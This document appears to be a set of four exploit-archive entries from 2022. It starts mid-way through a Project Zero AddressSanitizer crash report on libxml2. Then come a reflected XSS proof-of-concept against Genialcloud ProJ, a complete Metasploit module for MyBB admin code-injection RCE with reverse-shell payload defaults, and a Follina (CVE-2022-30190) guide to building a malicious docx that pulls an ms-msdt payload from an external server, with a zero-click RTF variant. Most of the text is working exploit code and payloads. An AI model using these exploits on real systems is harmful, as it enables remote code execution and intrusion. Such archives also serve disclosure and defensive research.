/usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2 #14 0x7ece3c in xmlXPathCompiledEvalInternal /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14339:11 #15 0x7eca34 in xmlXPathCompiledEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14385:5 #16 0x588140 in xsltPreCompEval /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:385:11 #17 0x589ba5 in xsltValueOf /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:4541:11 #18 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17 #19 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5 #20 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2 #21 0x58cbbc in xsltApplyTemplates /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5095:2 #22 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17 #23 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5 #24 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2 #25 0x57199f in xsltDefaultProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:1997:3 #26 0x570b62 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2129:2 #27 0x593919 in xsltApplyStylesheetInternal /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5987:5 #28 0x4eb14a in xsltProcess /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c #29 0x4e8cf5 in main /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c:935:6 #30 0x7fe6fc94f7ec in __libc_start_main csu/../csu/libc-start.c:332:16 SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b37d1) in __asan_memmove Shadow bytes around the buggy address: 0x0ffd19895cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffd19895cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffd19895cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffd19895ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffd19895cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0ffd19895d00: 00[04]fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffd19895d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffd19895d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffd19895d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffd19895d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffd19895d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==244487==ABORTING ``` This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. **The scheduled deadline is 2022-06-06**. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html Related CVE Numbers: CVE-2022-29824. Found by: fwilhelm@google.com </code></pre>

<pre><code># Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting) # Date: 2022-06-01 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.avantune.com # Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com # Version: 10 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39) # CVE: CVE-2022-29296 Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject and execute arbitrary web scripts or HTML via a crafted payload. Request parameters affected is "msg". PoC Request: GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1 Host: [REDACTED] Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Connection: close Cache-Control: max-age=0 PoC Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Wed, 11 May 2022 10:51:10 GMT Connection: close Content-Length: 8162 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><link rel="stylesheet" ...[SNIP]... <script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script> ...[SNIP]... Timeline: 2022-01-05: Vulnerability discovered. 2022-01-06: Vendor contacted. 2022-02-07: No reply, vendor contacted for 2nd time. 2022-02-10: Request for CVE reservation. 2022-04-16: Assigned CVE number CVE-2022-29296. 2022-05-07: No reply, vendor contacted for 3rd time. 2022-06-01: Public disclosure. PoC Screenshots: https://imagebin.ca/v/6j86ekMqKZD8 https://postimg.cc/XXv6YbK9 </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'MyBB Admin Control Code Injection RCE', 'Description' => %q{ This exploit module leverages an improper input validation vulnerability in MyBB prior to `1.8.30` to execute arbitrary code in the context of the user running the application. MyBB Admin Control setting page calls PHP `eval` function with an unsanitized user input. The exploit adds a new setting, injecting the payload in the vulnerable field, and triggers its execution with a second request. Finally, it takes care of cleaning up and removes the setting. Note that authentication is required for this exploit to work and the account must have rights to add or update settings (typically, myBB administrator role). }, 'License' => MSF_LICENSE, 'Author' => [ 'Cillian Collins', # vulnerability research 'Altelus', # original PoC 'Christophe De La Fuente' # MSF module ], 'References' => [ [ 'URL', 'https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f'], [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-22-503/'], [ 'URL', 'https://github.com/Altelus1/CVE-2022-24734'], [ 'CVE', '2022-24734'] ], 'Platform' => %w[php unix linux win], 'Privileged' => false, 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }, 'Type' => :in_memory } ], [ 'Unix (In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_php_ssl' }, 'Type' => :in_memory } ], [ 'Linux (Dropper)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, 'Type' => :dropper } ], [ 'Windows (In-Memory)', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }, 'Type' => :in_memory } ], [ 'Windows (Dropper)', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }, 'Type' => :dropper } ] ], 'DisclosureDate' => '2022-03-09', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('USERNAME', [ true, 'MyBB Admin CP username' ]), OptString.new('PASSWORD', [ true, 'MyBB Admin CP password' ]), OptString.new('TARGETURI', [ true, 'The URI of the MyBB application', '/']) ] ) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'GET', 'vars_get' => { 'intcheck' => 1 } }) return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 # see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310 unless res.body.include?('MYBB') return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}") end print_good("MyBB forum found running at #{target_uri.path}") return CheckCode::Detected end def login vprint_status('Attempting login') cookie_jar.cleanup(true) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/admin/index.php'), 'method' => 'POST', 'keep_cookies' => true, 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'do' => 'login' } }) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? unless res.body.match(/Logged in as .*#{datastore['USERNAME']}/) fail_with(Failure::NoAccess, "#{peer} - Invalid credentials") end print_good('Login successful!') end def send_config_settings(method: 'GET', action: 'add', vars_get: {}, vars_post: {}, check_response: true) req_hash = { 'uri' => normalize_uri(target_uri.path, '/admin/index.php'), 'method' => method, 'vars_get' => { 'module' => 'config-settings', 'action' => action }.merge(vars_get) } req_hash['vars_post'] = vars_post unless vars_post.blank? res = send_request_cgi(req_hash, datastore['WfsDelay'] > 0 ? datastore['WfsDelay'] : 2) if check_response && res.nil? fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") end res end def exploit login res = send_config_settings if res.body.include?('Access Denied') fail_with(Failure::NoAccess, "#{peer} - Supplied user doesn't have the rights to add a setting") end vprint_status('Adding a malicious settings') doc = res.get_html_document @my_post_key = doc.xpath('//input[@name="my_post_key"]/@value').text case target['Type'] when :in_memory execute_command(payload.encoded) when :dropper execute_cmdstager end end def send_payload(cmd) vprint_status('Adding a crafted configuration setting entry with the payload') cmd = cmd.gsub(/\\/, '\\' => '\\\\') cmd = cmd.gsub(/"/, '"' => '\\"') cmd = cmd.gsub(/\$/, '$' => '\\$') case target['Platform'] when 'php' extra = "\" . eval(\"#{cmd}\") .\"" when 'win' if target['Arch'] == ARCH_CMD # Force cmd to run in the background (only works for `cmd`) extra = "\" . pclose(popen(\"start /B #{cmd}\", \"r\")) .\"" else extra = "\" . system(\"#{cmd}\") .\"" end else extra = "\" . system(\"#{cmd} > /dev/null &\") .\"" end post_data = { my_post_key: @my_post_key, title: Rex::Text.rand_text_alpha(rand(8...16)), description: Rex::Text.rand_text_alpha(rand(8...16)), gid: 1, disporder: '', name: Rex::Text.rand_text_alpha(rand(8...16)), type: "\tphp", extra: extra, value: Rex::Text.rand_text_alpha(rand(8...16)) } res = send_config_settings(method: 'POST', vars_post: post_data) unless res.code == 302 doc = res.get_html_document err = doc.xpath('//div[@class="error"]').text fail_with(Failure::Unknown, "#{peer} - The module expected a 302 response but received: "\ "#{res.code}. Exploit didn't work.#{" Reason: #{err}" if err.present?}") end vprint_good('Payload successfully sent') end def trigger_payload vprint_status('Triggering the payload execution') # We're not expecting response to this query send_config_settings(action: 'change', check_response: false) end def remove_setting vprint_status('Removing the configuration setting') vprint_status('Grab the delete parameters') res = send_config_settings(action: 'manage') if res.body.include?('<title>MyBB Control Panel - Login</title>') # this exploit seems to logout users sometimes, so, try to login again and retry print_status('User session is not valid anymore. Trying to login again to cleanup') login res = send_config_settings(action: 'manage') end doc = res.get_html_document control_links = doc.xpath('//div[@class="popup_item_container"]/a/@href') uri = control_links.detect do |href| href.text.include?('action=delete') && href.text.include?("my_post_key=#{@my_post_key}") end if uri.nil? print_warning("#{peer} - URI not found in `Modify Settings` page - cannot cleanup") return end vprint_status('Send the delete request') params = uri.text.split('?')[1] get_data = CGI.parse(params).transform_values(&:join) send_config_settings(method: 'POST', vars_get: get_data) end def execute_command(cmd, _opt = {}) send_payload(cmd) trigger_payload remove_setting print_status('Shell incoming...') end end </code></pre>

<pre><code># POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina > Info : [New Microsoft Office zero-day used in attacks to execute PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/) ## Summary On the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research Team, discovered a malicious Office document shared on Virustotal. This document is using an unusual, but known scheme to infect its victims. The scheme was not detected as malicious by some EDR, like Microsoft Defender for Endpoint. This vulnerability could lead to code execution without the need of user interaction, as it does not involve macros, except if the Protected View mode is enabled. There is no CVE number attributed yet. ## Technical Details The vulnerability is being exploited by using the MSProtocol URI scheme to load some code. Attackers could embed malicious links inside Microsoft Office documents, templates or emails beginning with ms-msdt: that will be loaded and executed afterward without user interaction - except if the Protected View mode is enabled. Nevertheless, converting the document to the RTF format could also bypass the Protected View feature. ## Proof of Concept MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters). The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros). Here are the steps to build a Proof-of-Concept docx: 1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx. 2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute ``` Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" ``` and `Target="embeddings/oleObject1.bin"` by changing the `Target` value and adding attribute `TargetMode`: ``` Target = "http://<payload_server>/payload.html!" TargetMode = "External" ``` Note the Id value (probably it is "rId5"). 3. Edit `word/document.xml`. Search for the "<o:OLEObject ..>" tag (with `r:id="rId5"`) and change the attribute from `Type="Embed"` to `Type="Link"` and add the attribute `UpdateMode="OnCall"`. NOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444). 4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`: ``` <!doctype html> <html lang="en"> <body> <script> //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \""; </script> </body> </html> ``` Note that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason). ## BONUS (0-click RTF version) If you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3: ``` <o:LinkType>EnhancedMetaFile</o:LinkType> <o:LockedField>false</o:LockedField> <o:FieldCodes>\f 0</o:FieldCodes> ``` then it'll work as RTF also (open the resulting docx and save it as RTF). With RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. ## Sources : - https://nao-sec.org/about - https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection - https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ </code></pre>